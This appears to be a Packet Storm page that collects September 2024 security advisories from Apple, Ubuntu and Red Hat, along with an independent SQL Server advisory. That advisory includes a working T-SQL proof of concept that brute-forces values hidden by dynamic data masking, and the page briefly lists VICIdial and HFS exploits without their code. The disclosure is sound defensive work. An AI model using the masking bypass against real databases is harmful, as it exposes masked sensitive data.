Apple Security Advisory 09-16-2024-8 - iOS 17.7 and iPadOS 17.7 addresses bypass, out of bounds access, and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-09-16-2024-8 iOS 17.7 and iPadOS 17.7iOS 17.7 and iPadOS 17.7 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121246.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker with physical access to a locked device may be ableto Control Nearby Devices via accessibility featuresDescription: This issue was addressed through improved state management.CVE-2024-44171: Jake DerouinCompressionAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Unpacking a maliciously crafted archive may allow an attacker towrite arbitrary filesDescription: A race condition was addressed with improved locking.CVE-2024-27876: Snoolie Keffaber (@0xilis)Game CenterAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: A file access issue was addressed with improved inputvalidation.CVE-2024-40850: Denis Tokarev (@illusionofcha0s)ImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to unexpected appterminationDescription: An out-of-bounds read issue was addressed with improvedinput validation.CVE-2024-27880: Junsung LeeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing an image may lead to a denial-of-serviceDescription: An out-of-bounds access issue was addressed with improvedbounds checking.CVE-2024-44176: dw0r of ZeroPointer Lab working with Trend Micro ZeroDay Initiative, an anonymous researcherIOSurfaceAcceleratorAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to cause unexpected system terminationDescription: The issue was addressed with improved memory handling.CVE-2024-44169: Antonio ZekićKernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Network traffic may leak outside a VPN tunnelDescription: A logic issue was addressed with improved checks.CVE-2024-44165: Andrew LytvynovKernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may gain unauthorized access to BluetoothDescription: This issue was addressed through improved state management.CVE-2024-44191: Alexander Heinrich, SEEMOO, DistriNet, KU Leuven(@vanhoefm), TU Darmstadt (@Sn0wfreeze) and Mathy VanhoefMail AccountsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to access information about a user's contactsDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2024-40791: Rodolphe BRUNETTI (@eisw0lf)mDNSResponderAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to cause a denial-of-serviceDescription: A logic error was addressed with improved error handling.CVE-2024-44183: Olivier LevonSafari Private BrowsingAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Private Browsing tabs may be accessed without authenticationDescription: This issue was addressed through improved state management.CVE-2024-44127: Anamika AdhikariShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: A shortcut may output sensitive user data without consentDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-44158: Kirin (@Pwnrin)ShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to observe data displayed to the user byShortcutsDescription: A privacy issue was addressed with improved handling oftemporary files.CVE-2024-40844: Kirin (@Pwnrin) and luckyu (@uuulucky) of NorthSeaSync ServicesAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: This issue was addressed with improved checks.CVE-2024-44164: Mickey Jin (@patch1t)TransparencyAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: A permissions issue was addressed with additionalrestrictions.CVE-2024-44184: Bohdan Stasiuk (@Bohdan_Stasiuk)UIKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker may be able to cause unexpected app terminationDescription: The issue was addressed with improved bounds checks.CVE-2024-27879: Justin CohenThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 17.7 and iPadOS 17.7".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmbo1AEACgkQX+5d1TXaIvr0LBAAn28J4FgN4GG7wRGwiXT2GIy0vuGDc8bbNiezEqpkSL1XtjFl0e4ChhtB7VWnEhCd2yq/6iy7yak3EiKuYngQZ79O3dBERviNFgM5pK8hxX46WR3K/M69U9iOszkmaOOE81mTiAKCjy4MP8qMsvHY79ZA0r9Bl2aJCQJMAscs4mQ+Gfy2OAWDHKrGd1iapLxp2jQRVDlguKL8slJDIql3LD2anZ/4qob9cnE9b2z0g0r8Iv/vjlZXdOseGx7TqQ/kWlg6rBHf9KhSjr+ipFfvFYJ9O+QCAcwgtilPkRmD4q3MiCZqG234qhmB4ZVrW3NrJQVR4ACF8e+tnB79pcXeVMvhytpUdY+fAxffihkbLzIydI5EriuAvtpitmI3hwqLwJBwHOSDroCOs6kIkDL4RXVCSkIuwiRfa/hWxVJE9lYQxUCH7vR4KomrwnuB7hhN3oqeRgXqtB1HcJ8Elu3KnA8rebF1X1TcMqTc5LbqZwCPDOAU07HfTVBaxWlLh0NfmXq2JIE+yozNTOySEvggfYiXL5JopRXocF0YWne63OoA0vhvljQhEClQRQifB4daPnmyxxJOWFhqY8dMcnrfb0xXB5OyxZFG1AiGLjg5qaSQYMAZoJvImuTVwFSKuKBHs7ahXn7EVojoe7m9WEiRqCXiORHmT6BF3vmWidni5Xs==J1rf-----END PGP SIGNATURE-----

Apple Security Advisory 09-16-2024-8

Microsoft SQL Server versions 2014, 2016, 2017, 2019, and 2022 suffer from an issue where masked data can be exposed through a brute force attack.

Title: SQL Server Masked Data Exposure Through Brute Force Attack  
Product:                   Database  
Manufacturer:              Microsoft  
Affected Version(s):       SQL Server 2014, 2016,2017,2019,2022  
Tested Version(s):         SQL Server 2014, 2016,2017,2019,2022  
Risk Level:                Low  
Security Feature:          Dynamic Data Masking  
Author of Advisory:        Emad Al-Mousa

*****************************************  
Vulnerability Details And Back Ground:

Microsoft SQL Server database system has a security feature called "dynamic data masking" , this feature is designed to redact/mask column level values (columns containing sensitive data ….for example credit card number…etc).

The feature is good but has many security weaknesses that organizations/companies should be aware of. Among them is brute force technique against the “where” conditional clause to retrieve actual data values (numeric values).

*****************************************  
Proof of Concept (PoC):

I will create database called demodb and create table called dbo.COMPANY and insert dummy data in it:

create database demodb;

USE [demodb]

GO

SET ANSI_NULLS ON

GO

SET QUOTED_IDENTIFIER ON

GO

CREATE TABLE [dbo].[COMPANY](

[COMPANY_NAME] [nvarchar](max) NULL,

[SALES] [int] NULL

) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_C','93')

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_A','11')

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_B','78')

GO

------  I will enable dynamic data masking function against SALES column:

 ALTER TABLE dbo.COMPANY

ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');

------ Then, will create a user called reg_user that can only query the table, so the user will only see SALES column with complete masked data [ZERO values]:

USE [demodb]

GO

CREATE USER reg_user WITHOUT LOGIN;

GRANT SELECT ON dbo.COMPANY to reg_user;

EXECUTE AS USER = 'reg_user';

SELECT * FROM dbo.COMPANY;

REVERT;

------ However, using the same non-privileged database account reg_user …I will be able to extract Actual Values :

EXECUTE AS USER = 'reg_user';

 DECLARE @sales_txt nvarchar(max);

 DECLARE @LCounter INT= 1;

 WHILE (@LCounter < 99)

 BEGIN

SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar)

   FROM dbo.COMPANY

   WHERE SALES=@LCounter)

   print @sales_txt

   SET @LCounter  = @LCounter  + 1

   END

REVERT;

Output:

COMPANY_A sales is 11

COMPANY_B sales is 78

COMPANY_C sales is 93

------ Actual values were successfully extracted from the masked column !

*****************************************

Protection Mechanisms:

1. Ensure network firewall rules are in-place to ensure database accounts can be connected to the destination database server host from specific list of source hosts. This will add good  
security protection layer especially if database account credentials were exposed.

2. Implement Security Auditing against identified sensitive tables.

3. Implement other security features along dynamic data masking such as encryption. of course Always Encrypted feature is the best in terms of data protection.

*****************************************  
References:  
https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16  
https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/  
https://www.youtube.com/watch?v=NiAg0sGsGtw

Microsoft SQL Server Masked Data Exposure

Ubuntu Security Notice 7014-1 - It was discovered that the nginx ngx_http_mp4 module incorrectly handled certain malformed mp4 files. In environments where the mp4 directive is in use, a remote attacker could possibly use this issue to cause nginx to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7014-1September 16, 2024nginx vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:nginx could be made to crash if it received specially crafted networktraffic.Software Description:- nginx: small, powerful, scalable web/proxy serverDetails:It was discovered that the nginx ngx_http_mp4 module incorrectly handledcertain malformed mp4 files. In environments where the mp4 directive is inuse, a remote attacker could possibly use this issue to cause nginx tocrash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   nginx                           1.24.0-2ubuntu7.1   nginx-common                    1.24.0-2ubuntu7.1   nginx-core                      1.24.0-2ubuntu7.1   nginx-extras                    1.24.0-2ubuntu7.1   nginx-full                      1.24.0-2ubuntu7.1   nginx-light                     1.24.0-2ubuntu7.1Ubuntu 22.04 LTS   nginx                           1.18.0-6ubuntu14.5   nginx-common                    1.18.0-6ubuntu14.5   nginx-core                      1.18.0-6ubuntu14.5   nginx-extras                    1.18.0-6ubuntu14.5   nginx-full                      1.18.0-6ubuntu14.5   nginx-light                     1.18.0-6ubuntu14.5Ubuntu 20.04 LTS   nginx                           1.18.0-0ubuntu1.6   nginx-common                    1.18.0-0ubuntu1.6   nginx-core                      1.18.0-0ubuntu1.6   nginx-extras                    1.18.0-0ubuntu1.6   nginx-full                      1.18.0-0ubuntu1.6   nginx-light                     1.18.0-0ubuntu1.6In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7014-1   CVE-2024-7347Package Information:   https://launchpad.net/ubuntu/+source/nginx/1.24.0-2ubuntu7.1   https://launchpad.net/ubuntu/+source/nginx/1.18.0-6ubuntu14.5   https://launchpad.net/ubuntu/+source/nginx/1.18.0-0ubuntu1.6

Ubuntu Security Notice USN-7014-1

Apple Security Advisory 09-16-2024-7 - Xcode 16 addresses unauthorized access issues.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-16-2024-7 Xcode 16

Xcode 16 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121239.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

IDE Documentation  
Available for: macOS Sonoma 14.5 and later  
Impact: A malicious application may gain access to a user's Keychain  
items  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2024-44162: Mickey Jin (@patch1t)

IDE Tools  
Available for: macOS Sonoma 14.5 and later  
Impact: An attacker may be able to determine the Apple ID of the owner  
of the computer  
Description: A privacy issue was addressed by removing sensitive data.  
CVE-2024-40862: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Kernel  
Available for: macOS Sonoma 14.5 and later  
Impact: An app may gain unauthorized access to Bluetooth  
Description: This issue was addressed through improved state management.  
CVE-2024-44191: Alexander Heinrich, SEEMOO, DistriNet, KU Leuven  
(@vanhoefm), TU Darmstadt (@Sn0wfreeze) and Mathy Vanhoef

Additional recognition

Reality Composer Pro  
We would like to acknowledge Ron Masas of BreakPoint.sh for their  
assistance.

Swift  
We would like to acknowledge Banavath Aravind for their assistance.

Xcode 16 may be obtained from:  
https://developer.apple.com/xcode/downloads/  To check that the Xcode  
has been updated:  * Select Xcode in the menu bar * Select About  
Xcode * The version after applying this update will be "Xcode 16".

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmboyXkACgkQX+5d1TXa  
IvqCRxAAg1rkAKtcgeWhSMqBPcPT8p3dpGm0gm6f5bIIJHefxwmHcNjS6GJh7Doi  
g3Dv+MJiGLOa/B0fqdDlAuimxAyW5KrMKl4oXHmo0Hl0D8SHi2f+NL3JI91SmZts  
rs1L4VpbR9uUJTCoXeZOXVH+LnXDN6jfUpD5+23kFJtuRBGw8a7BHRD1H0sl7yi9  
sS8n6zvYujiQyS8zP1NWkpxVMaLwTqFuE4gLR7Whjod70cPkQOzUpa2pmvA/xSXQ  
hpT8jhV1EVXVCGySkOmks3sdOxMg2PTTJ0l1r/hsLZSOhvbG6XyLPp1Y79uGLsnn  
aZIIHdHg9DWyoy8KNbgMsyjQC5/ZMkcEQloIgdx/vH3L0WDEa+/sZObrkERAKhZi  
qJneaBWmasy/I6QuoBihyo1EJhXRcDgw/7wjJaTPxJVJEAEVXMnwhz4UokvAE6CU  
Jo4qH1Yi6LLbCFuSUKUzJTq6OC0kssVp6Se2WAaqIm+5+374BgW/x2diaS1eLgYo  
e6db73koL1apAgP4vMvg3GUTA0/e4siZ9rAKYnRTghPWaKMX93Yeab9xHh5tNKb7  
INav09fDLuGBs97oe9pBfDFajYACaGdmYDA/mtoKchMt5gkgcovysjfV51KXdz8L  
dMGDYdOAtf0Lg0YkyuKEPzfYIoeTBKhWq1hZYS+ZQVULd5gkysM=  
=o+oG  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-16-2024-7

Red Hat Security Advisory 2024-6720-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6720.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6720-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6720  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6720-03

Red Hat Security Advisory 2024-6719-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6719.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6719-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6719  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6719-03

Apple Security Advisory 09-16-2024-6 - Safari 18 addresses cross site scripting and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-16-2024-6 Safari 18

Safari 18 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121241.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Visiting a malicious website may lead to address bar spoofing  
Description: The issue was addressed with improved UI.  
WebKit Bugzilla: 279451  
CVE-2024-40866: Hafiizh and YoKo Kho (@yokoacc) of HakTrak

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: A malicious website may exfiltrate data cross-origin  
Description: A cross-origin issue existed with "iframe" elements. This  
was addressed with improved tracking of security origins.  
WebKit Bugzilla: 279452  
CVE-2024-44187: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing maliciously crafted web content may lead to universal  
cross site scripting  
Description: This issue was addressed through improved state management.  
WebKit Bugzilla: 268724  
CVE-2024-40857: Ron Masas

Additional recognition

Safari  
We would like to acknowledge Hafiizh and YoKo Kho (@yokoacc) of HakTrak  
for their assistance.

Safari 18 may be obtained from the Mac App Store.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmboyScACgkQX+5d1TXa  
Ivr5URAAqi3Km6vP17ccXkXlrcDJXrYE+HSdkDkqlpT0hNsfLCcpfbZME8R02efV  
lzb8JZ7DdtWI4U0WKjvJvmIhm0Ik2S1stYCNaxAtEBJ6YUYIJE5lJS4J/D3J1QTd  
5ygCi+zEzPnRjQx2BZ1Ju3VQdpDen50vTBY/cdqrujtbZ5s4wY2K2qV5SaPv7/zY  
6KChB6ivmuEN/iEN5e/ppTr3lAC1Hw1GFsD6xqnxK+USyydYGryQHvCzoidYjoaB  
7MkfwASZ/+RmdeCK+6pcN4NP8MRszViGas0GtZe+y7O/Pu6gc6PRrpD2s2LJKUta  
id0ofA1EtL+IRav/wXvJbvTBQc2vWhOrFWL4rP/9znCW2wtO8neayKewWYal1ClZ  
Jn75AOig5pfk6/aTtFFVXn/869PlolaVWe/jQuTVHvXX+N1nuDCriTRpVsz/XMdb  
3kWqsgMMxKjJnFQoprKpJcAA+vc28L5WLBxhXgGkcb8DML70YNg96CsH3w+qUrJL  
w9+AiGrgBECU3MhQOENtE8AmTmYMDCxjnEI8pYcsu5mKmLHkBnjRhYArLP+Se+3d  
PLHvbAaZf/cmO7Vm4A2uu1bhqf+E3UJLIlkIGMcwp+vQBiSAT70hri8J6fcaCvLq  
Hw7rhBt/najjjENdErB9REmqAjkJY3vP2K4pjE/1PNXmHd5tQu4=  
=q+/h  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-16-2024-6

Ubuntu Security Notice 7013-1 - It was discovered that Dovecot incorrectly handled a large number of address headers. A remote attacker could possibly use this issue to cause Dovecot to consume resources, leading to a denial of service. It was discovered that Dovecot incorrectly handled very large headers. A remote attacker could possibly use this issue to cause Dovecot to consume resources, leading to a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7013-1September 16, 2024dovecot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Dovecot.Software Description:- dovecot: IMAP and POP3 email serverDetails:It was discovered that Dovecot incorrectly handled a large number ofaddress headers. A remote attacker could possibly use this issue to causeDovecot to consume resources, leading to a denial of service.(CVE-2024-23184)It was discovered that Dovecot incorrectly handled very large headers. Aremote attacker could possibly use this issue to cause Dovecot to consumeresources, leading to a denial of service. (CVE-2024-23185)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   dovecot-core                    1:2.3.16+dfsg1-3ubuntu2.4Ubuntu 20.04 LTS   dovecot-core                    1:2.3.7.2-1ubuntu3.7In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7013-1   CVE-2024-23184, CVE-2024-23185Package Information:   https://launchpad.net/ubuntu/+source/dovecot/1:2.3.16+dfsg1-3ubuntu2.4   https://launchpad.net/ubuntu/+source/dovecot/1:2.3.7.2-1ubuntu3.7

Ubuntu Security Notice USN-7013-1

Proof of concept exploit that allows an attacker to retrieve administrative credentials through SQL injection and ultimately execute arbitrary code on the target server.

VICIdial SQL Injection / Remote Code Execution

Proof of concept remote code execution exploit for Rejetto HTTP File Server (HFS) version 2.3m.

Source

Packet Storm